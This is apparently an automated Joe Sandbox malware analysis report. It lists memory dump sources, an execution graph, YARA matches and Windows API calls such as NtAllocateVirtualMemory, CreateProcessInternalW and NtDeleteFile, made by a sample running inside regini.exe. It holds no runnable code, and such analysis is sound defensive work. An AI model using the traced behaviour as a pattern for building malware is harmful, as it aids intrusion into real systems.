                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$@
                                                                    • API String ID: 0-1194432280

                                                                    Execution Graph

                                                                    Execution Coverage:2.6%
                                                                    Dynamic/Decrypted Code Coverage:4.3%
                                                                    Signature Coverage:2.3%
                                                                    Total number of Nodes:439
                                                                    Total number of Limit Nodes:71
96807->96809 96808->96805 96809->96805 96811 2e11d4b 96810->96811 96826 2e181b0 96811->96826 96813 2e11d53 96824 2e12023 96813->96824 96837 2e2b860 96813->96837 96815 2e11d69 96816 2e2b860 RtlAllocateHeap 96815->96816 96817 2e11d7a 96816->96817 96818 2e2b860 RtlAllocateHeap 96817->96818 96819 2e11d8b 96818->96819 96825 2e11e22 96819->96825 96844 2e16d50 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96819->96844 96821 2e14880 2 API calls 96822 2e11fd2 96821->96822 96840 2e28170 96822->96840 96824->96791 96825->96821 96827 2e181db 96826->96827 96845 2e180a0 96827->96845 96830 2e18221 96834 2e296e0 NtClose 96830->96834 96835 2e1823d 96830->96835 96831 2e18209 96832 2e18214 96831->96832 96833 2e296e0 NtClose 96831->96833 96832->96813 96833->96832 96836 2e18233 96834->96836 96835->96813 96836->96813 96856 2e29a00 96837->96856 96839 2e2b87b 96839->96815 96842 2e281d2 96840->96842 96841 2e281df 96841->96824 96842->96841 96859 2e12040 96842->96859 96844->96825 96846 2e180ba 96845->96846 96850 2e18196 96845->96850 96851 2e28dd0 96846->96851 96849 2e296e0 NtClose 96849->96850 96850->96830 96850->96831 96852 2e28dea 96851->96852 96855 36735c0 LdrInitializeThunk 96852->96855 96853 2e1818a 96853->96849 96855->96853 96857 2e29a1d 96856->96857 96858 2e29a2e RtlAllocateHeap 96857->96858 96858->96839 96860 2e1204a 96859->96860 96876 2e18480 96860->96876 96862 2e12060 96870 2e125b3 96862->96870 96880 2e213a0 96862->96880 96865 2e12275 96888 2e2c950 96865->96888 96866 2e120bb 96866->96870 96883 2e2c820 96866->96883 96868 2e1228a 96872 2e122d7 96868->96872 96894 2e10b80 96868->96894 96869 2e18420 LdrInitializeThunk 96869->96872 96870->96841 96872->96869 96872->96870 96874 2e10b80 LdrInitializeThunk 96872->96874 96873 2e18420 LdrInitializeThunk 96875 2e12425 96873->96875 96874->96872 96875->96872 96875->96873 96877 2e1848d 96876->96877 96878 2e184b5 96877->96878 96879 2e184ae SetErrorMode 96877->96879 96878->96862 96879->96878 96897 2e2b6f0 96880->96897 96882 2e213c1 
96882->96866 96884 2e2c830 96883->96884 96885 2e2c836 96883->96885 96884->96865 96886 2e2b860 RtlAllocateHeap 96885->96886 96887 2e2c85c 96886->96887 96887->96865 96889 2e2c8c0 96888->96889 96890 2e2c91d 96889->96890 96891 2e2b860 RtlAllocateHeap 96889->96891 96890->96868 96892 2e2c8fa 96891->96892 96893 2e2b780 RtlFreeHeap 96892->96893 96893->96890 96904 2e29970 96894->96904 96900 2e29850 96897->96900 96899 2e2b721 96899->96882 96901 2e298df 96900->96901 96903 2e29878 96900->96903 96902 2e298f5 NtAllocateVirtualMemory 96901->96902 96902->96899 96903->96899 96905 2e2998d 96904->96905 96908 3672c70 LdrInitializeThunk 96905->96908 96906 2e10ba2 96906->96875 96908->96906 96909 2e170c0 96910 2e170ea 96909->96910 96913 2e18250 96910->96913 96912 2e17114 96914 2e1826d 96913->96914 96920 2e28e20 96914->96920 96916 2e182bd 96917 2e182c4 96916->96917 96925 2e28f00 96916->96925 96917->96912 96919 2e182ed 96919->96912 96921 2e28eb5 96920->96921 96923 2e28e48 96920->96923 96930 3672f30 LdrInitializeThunk 96921->96930 96922 2e28eee 96922->96916 96923->96916 96926 2e28faa 96925->96926 96927 2e28f2b 96925->96927 96931 3672d10 LdrInitializeThunk 96926->96931 96927->96919 96928 2e28fef 96928->96919 96930->96922 96931->96928 96932 2e17640 96933 2e176b2 96932->96933 96934 2e17658 96932->96934 96934->96933 96936 2e1b560 96934->96936 96937 2e1b586 96936->96937 96938 2e1b7b9 96937->96938 96963 2e29ae0 96937->96963 96938->96933 96940 2e1b5fc 96940->96938 96941 2e2c950 2 API calls 96940->96941 96942 2e1b61b 96941->96942 96942->96938 96943 2e1b6f2 96942->96943 96944 2e28d30 LdrInitializeThunk 96942->96944 96946 2e15e60 LdrInitializeThunk 96943->96946 96947 2e1b711 96943->96947 96945 2e1b67d 96944->96945 96945->96943 96949 2e1b686 96945->96949 96946->96947 96962 2e1b7a1 96947->96962 96969 2e288a0 96947->96969 96948 2e1b6da 96951 2e18420 LdrInitializeThunk 96948->96951 96949->96938 96949->96948 96950 2e1b6b8 96949->96950 96966 2e15e60 96949->96966 96984 2e249b0 LdrInitializeThunk 
96950->96984 96956 2e1b6e8 96951->96956 96952 2e18420 LdrInitializeThunk 96957 2e1b7af 96952->96957 96956->96933 96957->96933 96958 2e1b778 96974 2e28950 96958->96974 96960 2e1b792 96979 2e28ab0 96960->96979 96962->96952 96964 2e29afa 96963->96964 96965 2e29b0b CreateProcessInternalW 96964->96965 96965->96940 96967 2e28f00 LdrInitializeThunk 96966->96967 96968 2e15e9e 96967->96968 96968->96950 96970 2e28917 96969->96970 96971 2e288c8 96969->96971 96985 36739b0 LdrInitializeThunk 96970->96985 96971->96958 96972 2e2893c 96972->96958 96975 2e289c7 96974->96975 96977 2e28978 96974->96977 96986 3674340 LdrInitializeThunk 96975->96986 96976 2e289ec 96976->96960 96977->96960 96980 2e28b27 96979->96980 96982 2e28ad8 96979->96982 96987 3672fb0 LdrInitializeThunk 96980->96987 96981 2e28b4c 96981->96962 96982->96962 96984->96948 96985->96972 96986->96976 96987->96981 96988 2e29640 96989 2e296b1 96988->96989 96991 2e29668 96988->96991 96990 2e296c7 NtDeleteFile 96989->96990 97205 2e2c880 97206 2e2b780 RtlFreeHeap 97205->97206 97207 2e2c895 97206->97207 96992 2e19f45 96993 2e19f50 96992->96993 96994 2e19f79 96993->96994 96995 2e2b780 RtlFreeHeap 96993->96995 96995->96994 96996 2e18b47 96997 2e18b4a 96996->96997 96998 2e18b01 96997->96998 97000 2e173e0 96997->97000 97001 2e173f6 97000->97001 97003 2e1742f 97000->97003 97001->97003 97004 2e17250 LdrLoadDll LdrLoadDll 97001->97004 97003->96998 97004->97003 97005 2e1fad0 97006 2e1fb34 97005->97006 97034 2e165f0 97006->97034 97008 2e1fc6e 97009 2e1fc67 97009->97008 97041 2e16700 97009->97041 97011 2e1fcea 97012 2e1fe22 97011->97012 97031 2e1fe13 97011->97031 97045 2e1f8b0 97011->97045 97013 2e296e0 NtClose 97012->97013 97015 2e1fe2c 97013->97015 97016 2e1fd26 97016->97012 97017 2e1fd31 97016->97017 97018 2e2b860 RtlAllocateHeap 97017->97018 97019 2e1fd5a 97018->97019 97020 2e1fd63 97019->97020 97021 2e1fd79 97019->97021 97022 2e296e0 NtClose 97020->97022 97054 2e1f7a0 CoInitialize 97021->97054 97024 2e1fd6d 97022->97024 97025 
2e1fd87 97057 2e291b0 97025->97057 97027 2e1fe02 97028 2e296e0 NtClose 97027->97028 97029 2e1fe0c 97028->97029 97030 2e2b780 RtlFreeHeap 97029->97030 97030->97031 97032 2e1fda5 97032->97027 97033 2e291b0 LdrInitializeThunk 97032->97033 97033->97032 97035 2e16623 97034->97035 97036 2e16647 97035->97036 97061 2e29250 97035->97061 97036->97009 97038 2e1666a 97038->97036 97039 2e296e0 NtClose 97038->97039 97040 2e166ec 97039->97040 97040->97009 97042 2e16725 97041->97042 97066 2e29040 97042->97066 97046 2e1f8cc 97045->97046 97047 2e14880 2 API calls 97046->97047 97049 2e1f8ea 97047->97049 97048 2e1f8f3 97048->97016 97049->97048 97050 2e14880 2 API calls 97049->97050 97051 2e1f9be 97050->97051 97052 2e14880 2 API calls 97051->97052 97053 2e1fa18 97051->97053 97052->97053 97053->97016 97056 2e1f805 97054->97056 97055 2e1f89b CoUninitialize 97055->97025 97056->97055 97058 2e291ca 97057->97058 97071 3672ba0 LdrInitializeThunk 97058->97071 97059 2e291fa 97059->97032 97062 2e2926d 97061->97062 97065 3672ca0 LdrInitializeThunk 97062->97065 97063 2e29299 97063->97038 97065->97063 97067 2e2905d 97066->97067 97070 3672c60 LdrInitializeThunk 97067->97070 97068 2e16799 97068->97011 97070->97068 97071->97059 97072 2e1c8d0 97074 2e1c8f9 97072->97074 97073 2e1c9fd 97074->97073 97075 2e1c9a3 FindFirstFileW 97074->97075 97075->97073 97077 2e1c9be 97075->97077 97076 2e1c9e4 FindNextFileW 97076->97077 97078 2e1c9f6 FindClose 97076->97078 97077->97076 97078->97073 97079 2e1b050 97084 2e1ad60 97079->97084 97081 2e1b05d 97098 2e1a9e0 97081->97098 97083 2e1b073 97085 2e1ad85 97084->97085 97109 2e18690 97085->97109 97088 2e1aed0 97088->97081 97090 2e1aee7 97090->97081 97091 2e1aede 97091->97090 97093 2e1afd5 97091->97093 97128 2e1a430 97091->97128 97095 2e1b03a 97093->97095 97137 2e1a7a0 97093->97137 97096 2e2b780 RtlFreeHeap 97095->97096 97097 2e1b041 97096->97097 97097->97081 97099 2e1a9f3 97098->97099 97106 2e1a9fe 97098->97106 97100 2e2b860 RtlAllocateHeap 97099->97100 97100->97106 97101 
2e1aa1f 97101->97083 97102 2e18690 GetFileAttributesW 97102->97106 97103 2e1ad32 97104 2e1ad48 97103->97104 97105 2e2b780 RtlFreeHeap 97103->97105 97104->97083 97105->97104 97106->97101 97106->97102 97106->97103 97107 2e1a430 RtlFreeHeap 97106->97107 97108 2e1a7a0 RtlFreeHeap 97106->97108 97107->97106 97108->97106 97110 2e186b1 97109->97110 97111 2e186b8 GetFileAttributesW 97110->97111 97112 2e186c3 97110->97112 97111->97112 97112->97088 97113 2e235a0 97112->97113 97114 2e235ae 97113->97114 97115 2e235b5 97113->97115 97114->97091 97116 2e14880 2 API calls 97115->97116 97117 2e235ea 97116->97117 97118 2e235f9 97117->97118 97141 2e23060 LdrLoadDll LdrLoadDll 97117->97141 97120 2e2b860 RtlAllocateHeap 97118->97120 97124 2e237a4 97118->97124 97121 2e23612 97120->97121 97122 2e2379a 97121->97122 97121->97124 97125 2e2362e 97121->97125 97123 2e2b780 RtlFreeHeap 97122->97123 97122->97124 97123->97124 97124->97091 97125->97124 97126 2e2b780 RtlFreeHeap 97125->97126 97127 2e2378e 97126->97127 97127->97091 97129 2e1a456 97128->97129 97142 2e1de30 97129->97142 97131 2e1a4c8 97133 2e1a4e6 97131->97133 97134 2e1a650 97131->97134 97132 2e1a635 97132->97091 97133->97132 97147 2e1a2f0 97133->97147 97134->97132 97135 2e1a2f0 RtlFreeHeap 97134->97135 97135->97134 97138 2e1a7c6 97137->97138 97139 2e1de30 RtlFreeHeap 97138->97139 97140 2e1a84d 97139->97140 97140->97093 97141->97118 97144 2e1de54 97142->97144 97143 2e1de61 97143->97131 97144->97143 97145 2e2b780 RtlFreeHeap 97144->97145 97146 2e1dea4 97145->97146 97146->97131 97148 2e1a30d 97147->97148 97151 2e1dec0 97148->97151 97150 2e1a413 97150->97133 97152 2e1dee4 97151->97152 97153 2e1df8e 97152->97153 97154 2e2b780 RtlFreeHeap 97152->97154 97153->97150 97154->97153 97155 2e125d0 97156 2e28d30 LdrInitializeThunk 97155->97156 97157 2e12606 97156->97157 97160 2e29780 97157->97160 97159 2e1261b 97161 2e2980c 97160->97161 97163 2e297ab 97160->97163 97165 3672e80 LdrInitializeThunk 97161->97165 97162 2e2983d 97162->97159 97163->97159 
97165->97162 97166 2e219d0 97167 2e219ec 97166->97167 97168 2e21a14 97167->97168 97169 2e21a28 97167->97169 97170 2e296e0 NtClose 97168->97170 97171 2e296e0 NtClose 97169->97171 97172 2e21a1d 97170->97172 97173 2e21a31 97171->97173 97176 2e2b8a0 RtlAllocateHeap 97173->97176 97175 2e21a3c 97176->97175 97177 2e29550 97178 2e295f4 97177->97178 97180 2e2957b 97177->97180 97179 2e2960a NtReadFile 97178->97179 97213 2e20390 97214 2e203ad 97213->97214 97215 2e14880 2 API calls 97214->97215 97216 2e203cb 97215->97216 97181 3672ad0 LdrInitializeThunk

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "$%$&f$.@$<|$?:$F$I>$V.$W$X}$bG$dg$e%V.$hr$jO$p4$v${${P${]$~$h
                                                                    • API String ID: 0-844827240
                                                                    • Opcode ID: d56941347c9e308f37162984917cb5c97560ca15faac07f2d2fbf9c2cc7d79be
                                                                    • Instruction ID: 9f192189f822cb48300cdfee86f77f9b80560073b93fdee5266ad9812f6e1e08
                                                                    • Opcode Fuzzy Hash: d56941347c9e308f37162984917cb5c97560ca15faac07f2d2fbf9c2cc7d79be
                                                                    • Instruction Fuzzy Hash: EB2278B0D45229CBEB24CF45C998BDDBBB2BB44308F1092E9D1496B380D7B95AC9CF54
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 02E1C9B4
                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 02E1C9EF
                                                                    • FindClose.KERNELBASE(?), ref: 02E1C9FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 3541575487-0
                                                                    • Opcode ID: 3e55da1cfd8cad6bbb757cd532cfe8eb3c10e6acfd91596a3322c7845f83d105
                                                                    • Instruction ID: 3851ee82c587ee49cd985875b7d32346bc706a3abb565f7b7b5400c0ebfc916b
                                                                    • Opcode Fuzzy Hash: 3e55da1cfd8cad6bbb757cd532cfe8eb3c10e6acfd91596a3322c7845f83d105
                                                                    • Instruction Fuzzy Hash: 0F3192729803087BDB20DFA0CC85FEF777D9F48748F109559B509AA180D7B4AA85CBA1
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(?,24064BBE,?,?,?,?,?,?,?,?,?), ref: 02E294E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                    • Instruction ID: fb20311258fcc0b913ad7f946aa24f2ce63bab3d1aaae917f8c5a8162a85116e
                                                                    • Opcode Fuzzy Hash: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                    • Instruction Fuzzy Hash: CB31D4B5A41258AFCB14DF98D880EEEB7B9EF8C300F108219F919A7344D730A955CFA4
                                                                    APIs
                                                                    • NtReadFile.NTDLL(?,24064BBE,?,?,?,?,?,?,?), ref: 02E29633
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                    • Instruction ID: 51e2fe237a9c85c8f920119e124cb68fd18db3bc08c9726e4b5b4ef50b578c4a
                                                                    • Opcode Fuzzy Hash: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                    • Instruction Fuzzy Hash: 7631F5B5A40258AFCB14DF98D880EEFB7B9EF88310F108219F919A7344D730A951CFA5
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(02E120BB,24064BBE,02E281DF,00000000,00000004,00003000,?,?,?,?,?,02E281DF,02E120BB), ref: 02E29912
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: cedafb1025b038325b921a273ed17e15dc8af73268ddac6631b876435128dcc7
                                                                    • Instruction ID: 049e87d77f522267e1ca69cbc98750af36853844172cc4b0429e117ea32d4664
                                                                    • Opcode Fuzzy Hash: cedafb1025b038325b921a273ed17e15dc8af73268ddac6631b876435128dcc7
                                                                    • Instruction Fuzzy Hash: 88212BB5A40258ABDB14DF98DC41FEF77BAEF88300F108519F919AB344D770A9118BA5
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteFile
                                                                    • String ID:
                                                                    • API String ID: 4033686569-0
                                                                    • Opcode ID: e2871cfb3dc0ff402a426fcbebe61238aa19fe36c2eaceb1abd14c6b07a2ed57
                                                                    • Instruction ID: ebbaf581d5cd0aa0035d9d7734c21e9b4941a18af41aa83bd2ebaa2f89d260dd
                                                                    • Opcode Fuzzy Hash: e2871cfb3dc0ff402a426fcbebe61238aa19fe36c2eaceb1abd14c6b07a2ed57
                                                                    • Instruction Fuzzy Hash: 5211CE71A402187FD620EBA4CC41FAF73ADEF85304F008149FA1D6B280E775B9158BE5
                                                                    APIs
                                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02E29717
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                    • Instruction ID: 5831853b8112fb587abcd148efc190a50761f8101583b170a31d1f924c822ab9
                                                                    • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                    • Instruction Fuzzy Hash: 38E04636240214BBC220AA6ADC40FAB776DDFC6710F108819FA49BB280C671BA118BF0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 220226324abee41323fabff9899d2359fe1387d4f3b373e1cee263fcacd492e0
                                                                    • Instruction ID: 809977f9366c9fbda9797c0c7b21ec1f7a491882b24f294b8462c3611699f634
                                                                    • Opcode Fuzzy Hash: 220226324abee41323fabff9899d2359fe1387d4f3b373e1cee263fcacd492e0
                                                                    • Instruction Fuzzy Hash: 15900231605804129140B65848C4586400697E4301B95C111E0424658D8B548A565361
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 847cbb0c131c6079d94eee7b445a3d08d2fc4e92f06adea91e87819f2162aca8
                                                                    • Instruction ID: 2adb74a592e17b02683643e347870d444cf33e8ca16646f475d114a35ec6c132
                                                                    • Opcode Fuzzy Hash: 847cbb0c131c6079d94eee7b445a3d08d2fc4e92f06adea91e87819f2162aca8
                                                                    • Instruction Fuzzy Hash: CD900261601504424140B6584844446600697E53013D5C215A0554664D875889559269
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b47d092546cf0f668c24698b700959e6e4ba002d712871d4bc7a91d939c14bae
                                                                    • Instruction ID: 477d092c06117334780cd49e62da7514cc2248fe399308c3f7817f4bebfa49c6
                                                                    • Opcode Fuzzy Hash: b47d092546cf0f668c24698b700959e6e4ba002d712871d4bc7a91d939c14bae
                                                                    • Instruction Fuzzy Hash: 87900261202404034105B6584454656400B87E4301B95C121E1014694EC66589916125
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0d626bd91d65d7d372195edb5faf2278834fd64f8a997008c243e8304fa74afa
                                                                    • Instruction ID: 45fe79f86ada4a08304903ed8f6a16fdb893b5eff3353011f0b806c660d03e00
                                                                    • Opcode Fuzzy Hash: 0d626bd91d65d7d372195edb5faf2278834fd64f8a997008c243e8304fa74afa
                                                                    • Instruction Fuzzy Hash: 5190023120544C42D140B6584444A86001687D4305F95C111A0064798E97658E55B661
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c4ddd402f7adcbc87f20f0d8804259ccab9924af19a446120d43bc84c95672c4
                                                                    • Instruction ID: 9b1f26a2aaeee0eb726926c5200498220773c51982f232afdb7d29ea440c4cce
                                                                    • Opcode Fuzzy Hash: c4ddd402f7adcbc87f20f0d8804259ccab9924af19a446120d43bc84c95672c4
                                                                    • Instruction Fuzzy Hash: D890023120140C02D180B658444468A000687D5301FD5C115A0025758ECB558B5977A1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ba51f4069295b75a70f253e196f475a8fe8e23e9bd12d9cd149cb58aef0ef2c4
                                                                    • Instruction ID: e255ac6017c0f8023d8087a68b876ccfe483b10b3dd1a74a8bc27fc882ffe6f0
                                                                    • Opcode Fuzzy Hash: ba51f4069295b75a70f253e196f475a8fe8e23e9bd12d9cd149cb58aef0ef2c4
                                                                    • Instruction Fuzzy Hash: 3E90023160540C02D150B6584454786000687D4301F95C111A0024758E87958B5576A1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9865da355708da3dee31bec0f9514a92978feab2fe243d9eb4a2459ada50ae9d
                                                                    • Instruction ID: 1876c73531c03fd5f33fb72b88d5b2296e29a5202e95ac72e0d702bfd56775b3
                                                                    • Opcode Fuzzy Hash: 9865da355708da3dee31bec0f9514a92978feab2fe243d9eb4a2459ada50ae9d
                                                                    • Instruction Fuzzy Hash: 87900225221404020145FA58064454B044697DA3513D5C115F1416694DC76189655321
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2cadfc41327b4bb12c4be7e172952bb3ff4bd0c15ff566897a5d3e929471c4f4
                                                                    • Instruction ID: 5c99afa0f746733a33a2d0d181c16d202c37b6c620a31395c28dca174068b168
